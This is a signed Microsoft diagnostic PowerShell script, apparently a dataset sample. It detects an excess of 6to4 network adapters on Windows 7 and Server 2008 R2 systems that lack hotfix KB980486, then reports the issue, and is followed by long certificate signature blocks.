8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3BlcmF0 # aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjo4RDQxLTRCRjct # QjNCNzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZaIjCgEB # MAcGBSsOAwIaAxUAPYiXu8ORQ4hvKcuE7GK0COgxWnqggYMwgYCkfjB8MQswCQYD # VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe # MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3Nv # ZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIFAOnmEAgwIhgP # MjAyNDA1MDgyMjUxNTJaGA8yMDI0MDUwOTIyNTE1MlowdDA6BgorBgEEAYRZCgQB # MSwwKjAKAgUA6eYQCAIBADAHAgEAAgInxzAHAgEAAgIjMTAKAgUA6edhiAIBADA2 # BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAIDB6EgoQowCAIB # AAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAIfHgay843ZzCyaGk/jiQEXZZ5J9eWqj # aB7GxffGOIpKSDeSMB3B5NrfiGHjeksyY06URIhu6ee+uGC6VKmk1YFWSpcRLgE7 # V0wsGPPrC0PB/j85Yfn/lpNXQ8zCUTnS3AtThEu/H2lhPb12P9J1P9YxkQvHugzf # S78bq3P0VKmOMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENB # IDIwMTACEzMAAAHj372bmhxogyIAAQAAAeMwDQYJYIZIAWUDBAIBBQCgggFKMBoG # CSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQxIgQg1AVOa5Z6 # u8mFpGgzZVavlTf7+cOyJQrobAENP8gATKcwgfoGCyqGSIb3DQEJEAIvMYHqMIHn # MIHkMIG9BCAz1COr5bD+ZPdEgQjWvcIWuDJcQbdgq8Ndj0xyMuYmKjCBmDCBgKR+ # MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS # ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMT # HU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB49+9m5ocaIMiAAEA # AAHjMCIEIHyD6ASbMRJyhSglsjGN198SHKpa3GpLoVD9Ir4Z2mEaMA0GCSqGSIb3 # DQEBCwUABIICALM1WtZikw87q28aJR702pfEtzx+eJECkM4ETyHDATU2BQ455ufv # yuDuZuqK33fR9aFoUvko6jRMjM1FLkibh+jGYf06rjgL5pNxjIFcg0HO/fO0c9zi # TfZsW3DtsjfGtIfA1mKLpl0rjrvBhHPnxsRbPCbtuy3cGcFuKWt8ky1ijEv8y1cF # WWEGiNmTdOhZITfI4mE4qwLizLdwjLZOOJsqnFF3dVPZ/DUIfaZwm0bKlX7kg6Hn # W00UoxEClz+SM1Fq/Prk6k5eg464vfAmBqWPlUwrDBH3QD4ZgF/PK5c/PXhqQah+ # W8vNqxEwdLQAFCYeswQdFQa7QBxYvuDwYNjIUFpg8FgClingKcmSQXnmAgjg2mhl # c4ivvk/qPv5NF9WtkU8ngn3n0Xa2yMnlVX+FohqnULcD2KdH8lksOZgUMcbnDWr0 # zSx7pamvHlgbG8crcTfuawc9XnxGfGeXSEDLz0fbJSOkjrrxoliQ8Xpftq4lFH1K # RA93M6lxeFNModxYiK7REK+15prdapfzRd97Cv8DIK4tv1S87fqjyUsV7zWOcQFB # yP6RKKJs3tOVPLXTz2wInJ3iXfkzvCxEi+wvKzp84/qdW9S8WI2ffCbAGRiYx3EM # GSMpm/R1puMABs1BMEb3C4PeaZ88AxsC3kSNbLowbL7DI100cbTIiPQJ # SIG # End signature block
combined_dataset/train/non-malicious/sample_1_33.ps1
sample_1_33.ps1
#************************************************ # TS_AdapterKB980486Check.ps1 # Version 1.0 # Date: 11-8-2011 # Author: v-anecho # Description: It was detected that the number of 6to4 adapters exceeded the number of physical network adapters on this computer. This may be a symptom of the issue described in KB980486. If affected by KB980486 the system may accrue an excessive number of adapters which can result in slow system startup performance as it tries to initialize each of the adapters. Please install the hotfix KB980486 to resolve this issue. #************************************************ Import-LocalizedData -BindingVariable ScriptStrings Write-DiagProgress -Activity $ScriptStrings.ID_AdapterKB980486Check -Status $ScriptStrings.ID_AdapterKB980486CheckDesc $RootCauseDetected = $false $RootCauseName = "RC_AdapterKB980486Check" #Rule ID 1099 #----------- # http://sharepoint/sites/rules/Rule%20Submissions/Windows%20-%20SBSL%20-%20Detect%20excessive%20number%20of%206to4%20NICs.xml #Description #----------- # It was detected that the number of 6to4 adapters exceeded the number of physical network adapters on this computer. This may be a symptom of the issue described in KB980486. If affected by KB980486 the system may accrue an excessive number of adapters which can result in slow system startup performance as it tries to initialize each of the adapters. Please install the hotfix KB980486 to resolve this issue. # #Related KB #---------- # 980486 # #Script Author #------------- # anecho #******************** #Data gathering #******************** $InformationCollected = new-object PSObject $HasIssue = $false #System 32 folder $System32Folder = Join-Path $env:windir "System32" Function isOSVersionServer2008R2orWin7 { # # .SYNOPSIS # Checks if the Machine is the proper OS version # .DESCRIPTION # Pulls the OSVersion and checks it against expected version # .NOTES # .LINK # .EXAMPLE # .OUTPUTS # Boolean value: [true] if the current system is the expected OS # otherwise [false] # .PARAMETER file # if($OSVersion.Build -eq 7600) { return $true } else { return $false } } Function is6to4GreaterThanPhysAdapters() { $NetworkAdapter = Get-CimInstance Win32_NetworkAdapter $PhysAdapters = $NetworkAdapter | Where-Object {$_.PhysicalAdapter.CompareTo($TRUE)} $6to4Adapters = $NetworkAdapter | Where-Object {$_.name -match "Microsoft 6to4 Adapter"} Set-Variable -Name 6to4AdaptersCount -Value $6to4Adapters.Count -Scope 1 Set-Variable -Name PhysAdaptersCount -Value $PhysAdapters.Count -Scope 1 If (($6to4Adapters -is [System.Array]) -and ($PhysAdapters -is [System.Array]) -and ($6to4AdaptersCount -gt $PhysAdaptersCount)) { return $true } Else { return $false } } Function isKB980486 { #Now we need to check for the binaries specified @ KB980486 if (CheckMinimalFileVersion "$System32Folder\Iphlpsvc.dll" 6 1 7600 20795) { return $true } else { return $false } } #******************** #Detection Logic #******************** #Detect if the OS is Windows 7 or Windows Server R2 #Detect if 6to4 adapter number is greater than physical adapters #Detect if KB 980486 is installed if ((isOSVersionServer2008R2orWin7) -and (is6to4GreaterThanPhysAdapters) -and (-not(isKB980486))) { $currentVersion = (Get-FileVersionString("$System32Folder\Iphlpsvc.dll")) add-member -inputobject $InformationCollected -membertype noteproperty -name "Number of 6to4 Adapters" -value $6to4AdaptersCount add-member -inputobject $InformationCollected -membertype noteproperty -name "Number of Physical Adapters" -value $PhysAdaptersCount add-member -inputobject $InformationCollected -membertype noteproperty -name "Current version: Iphlpsvc.dll" -value $currentVersion add-member -inputobject $InformationCollected -membertype noteproperty -name "Required version: Iphlpsvc.dll" -value "6.1.7600.20795" $HasIssue = $true } #******************** #Alert Evaluation #******************** if($HasIssue) { RaiseAlert $AlertType["Error"] $AlertTitle $AlertMessage $KBArticleNumber return $InformationCollected Update-DiagRootCause -id $RootCauseName -Detected $true Write-GenericMessage -RootCauseId $RootCauseName -PublicContentURL "http://support.microsoft.com/kb/980486" -Verbosity "Error" -InformationCollected $InformationCollected -Visibility 4 -SupportTopicsID 7988 } else { if(isOSVersionServer2008R2orWin7) { Update-DiagRootCause -id $RootCauseName -Detected $false } } # SIG # Begin signature block # MIIoVQYJKoZIhvcNAQcCoIIoRjCCKEICAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCA4Dq80OcOg+PdW # w8BEAQpm9DjFug1ttrlFR07/SKy54KCCDYUwggYDMIID66ADAgECAhMzAAAEA73V # lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV # LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY # oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi # kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/ # /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv # ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r # EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV # NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC # rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos # oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB # +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO # raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+ # sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W # +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s # IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu # iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGiYwghoiAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA # BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIHoL # DHMnSTdh6clhBgV5Z7337nG6HzsQdGTY9lgaGt8ZMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAF9Yd9uhSydYRawYoDaDm/avGcpb46m9CgcvA # 1qfnfvEJheQ/o5u9kNAQTuZ5zVZUi4JU20eQPH0cCYoqs9Ch+tTPiofoqayPEmAM # OG1Jj5NOoFqZ2CgiuEWAtTh/HNtn5kJFaZMqmWesvqLnl96JyaU5eRdZRc6Bj9+6 # 5trhzD2YLiHg2iwnniJ9NeB0a6yZJn+iI2drTVtqMU3pTuvh/sfV7rD+V3I+gZST # u1fTqOM+oPMJ9DfmKcTo8jr7kEqdr3NK1kdtRp/YpfL1EcSnZf6CDSYqGaicQAAj # xKXlsyoymB7sZoiGVoTHD/Lb0s9THO+7z8OrBW35yp3XFjlLmKGCF7AwghesBgor # BgEEAYI3AwMBMYIXnDCCF5gGCSqGSIb3DQEHAqCCF4kwgheFAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFaBgsqhkiG9w0BCRABBKCCAUkEggFFMIIBQQIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCDvXvAppvsuQyP+YxbwND3Bo140F84UyPKJ # dNSQYWNE7AIGZutC6/T/GBMyMDI0MTAyODExNDA0NC42MDlaMASAAgH0oIHZpIHW # MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT # Hm5TaGllbGQgVFNTIEVTTjo0MDFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z # b2Z0IFRpbWUtU3RhbXAgU2VydmljZaCCEf4wggcoMIIFEKADAgECAhMzAAAB/tCo # wns0IQsBAAEAAAH+MA0GCSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMB4XDTI0MDcyNTE4MzExOFoXDTI1MTAyMjE4MzExOFowgdMxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jv # c29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMeblNoaWVs # ZCBUU1MgRVNOOjQwMUEtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGlt # ZS1TdGFtcCBTZXJ2aWNlMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA # vLwhFxWlqA43olsE4PCegZ4mSfsH2YTSKEYv8Gn3362Bmaycdf5T3tQxpP3NWm62 # YHUieIQXw+0u4qlay4AN3IonI+47Npi9fo52xdAXMX0pGrc0eqW8RWN3bfzXPKv0 # 7O18i2HjDyLuywYyKA9FmWbePjahf9Mwd8QgygkPtwDrVQGLyOkyM3VTiHKqhGu9 # BCGVRdHW9lmPMrrUlPWiYV9LVCB5VYd+AEUtdfqAdqlzVxA53EgxSqhp6JbfEKnT # dcfP6T8Mir0HrwTTtV2h2yDBtjXbQIaqycKOb633GfRkn216LODBg37P/xwhodXT # 81ZC2aHN7exEDmmbiWssjGvFJkli2g6dt01eShOiGmhbonr0qXXcBeqNb6QoF8jX # /uDVtY9pvL4j8aEWS49hKUH0mzsCucIrwUS+x8MuT0uf7VXCFNFbiCUNRTofxJ3B # 454eGJhL0fwUTRbgyCbpLgKMKDiCRub65DhaeDvUAAJT93KSCoeFCoklPavbgQya # hGZDL/vWAVjX5b8Jzhly9gGCdK/qi6i+cxZ0S8x6B2yjPbZfdBVfH/NBp/1Ln7xb # eOETAOn7OT9D3UGt0q+KiWgY42HnLjyhl1bAu5HfgryAO3DCaIdV2tjvkJay2qOn # F7Dgj8a60KQT9QgfJfwXnr3ZKibYMjaUbCNIDnxz2ykCAwEAAaOCAUkwggFFMB0G # A1UdDgQWBBRvznuJ9SU2g5l/5/b+5CBibbHF3TAfBgNVHSMEGDAWgBSfpxVdAF5i # XYP05dJlpxtTNRnpcjBfBgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jv # c29mdC5jb20vcGtpb3BzL2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENB # JTIwMjAxMCgxKS5jcmwwbAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRw # Oi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRp # bWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1Ud # JQEB/wQMMAoGCCsGAQUFBwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsF # AAOCAgEAiT4NUvO2lw+0dDMtsBuxmX2o3lVQqnQkuITAGIGCgI+sl7ZqZOTDd8Lq # xsH4GWCPTztc3tr8AgBvsYIzWjFwioCjCQODq1oBMWNzEsKzckHxAzYo5Sze7OPk # MA3DAxVq4SSR8y+TRC2GcOd0JReZ1lPlhlPl9XI+z8OgtOPmQnLLiP9qzpTHwFze # +sbqSn8cekduMZdLyHJk3Niw3AnglU/WTzGsQAdch9SVV4LHifUnmwTf0i07iKtT # lNkq3bx1iyWg7N7jGZABRWT2mX+YAVHlK27t9n+WtYbn6cOJNX6LsH8xPVBRYAIR # VkWsMyEAdoP9dqfaZzwXGmjuVQ931NhzHjjG+Efw118DXjk3Vq3qUI1re34zMMTR # zZZEw82FupF3viXNR3DVOlS9JH4x5emfINa1uuSac6F4CeJCD1GakfS7D5ayNsaZ # 2e+sBUh62KVTlhEsQRHZRwCTxbix1Y4iJw+PDNLc0Hf19qX2XiX0u2SM9CWTTjsz # 9SvCjIKSxCZFCNv/zpKIlsHx7hQNQHSMbKh0/wwn86uiIALEjazUszE0+X6rcObD # fU4h/O/0vmbF3BMR+45rAZMAETJsRDPxHJCo/5XGhWdg/LoJ5XWBrODL44YNrN7F # RnHEAAr06sflqZ8eeV3FuDKdP5h19WUnGWwO1H/ZjUzOoVGiV3gwggdxMIIFWaAD # AgECAhMzAAAAFcXna54Cm0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYD # VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe # MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3Nv # ZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIy # MjVaFw0zMDA5MzAxODMyMjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo # aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y # cG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw # MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5 # vQ7VgtP97pwHB9KpbE51yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64 # NmeFRiMMtY0Tz3cywBAY6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhu # je3XD9gmU3w5YQJ6xKr9cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl # 3GoPz130/o5Tz9bshVZN7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPg # yY9+tVSP3PoFVZhtaDuaRr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I # 5JasAUq7vnGpF1tnYN74kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2 # ci/bfV+AutuqfjbsNkz2K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/ # TNuvXsLz1dhzPUNOwTM5TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy # 16cg8ML6EgrXY28MyTZki1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y # 1BzFa/ZcUlFdEtsluq9QBXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6H # XtqPnhZyacaue7e3PmriLq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMB # AAEwIwYJKwYBBAGCNxUCBBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQW # BBSfpxVdAF5iXYP05dJlpxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30B # ATBBMD8GCCsGAQUFBwIBFjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz # L0RvY3MvUmVwb3NpdG9yeS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYB # BAGCNxQCBAweCgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMB # Af8wHwYDVR0jBBgwFoAU1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBL # oEmgR4ZFaHR0cDovL2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMv # TWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggr # BgEFBQcwAoY+aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNS # b29DZXJBdXRfMjAxMC0wNi0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1Vffwq # reEsH2cBMSRb4Z5yS/ypb+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27 # DzHkwo/7bNGhlBgi7ulmZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pv # vinLbtg/SHUB2RjebYIM9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9Ak # vUCgvxm2EhIRXT0n4ECWOKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWK # NsIdw2FzLixre24/LAl4FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2 # kQH2zsZ0/fZMcm8Qq3UwxTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+ # c23Kjgm9swFXSVRk2XPXfx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep # 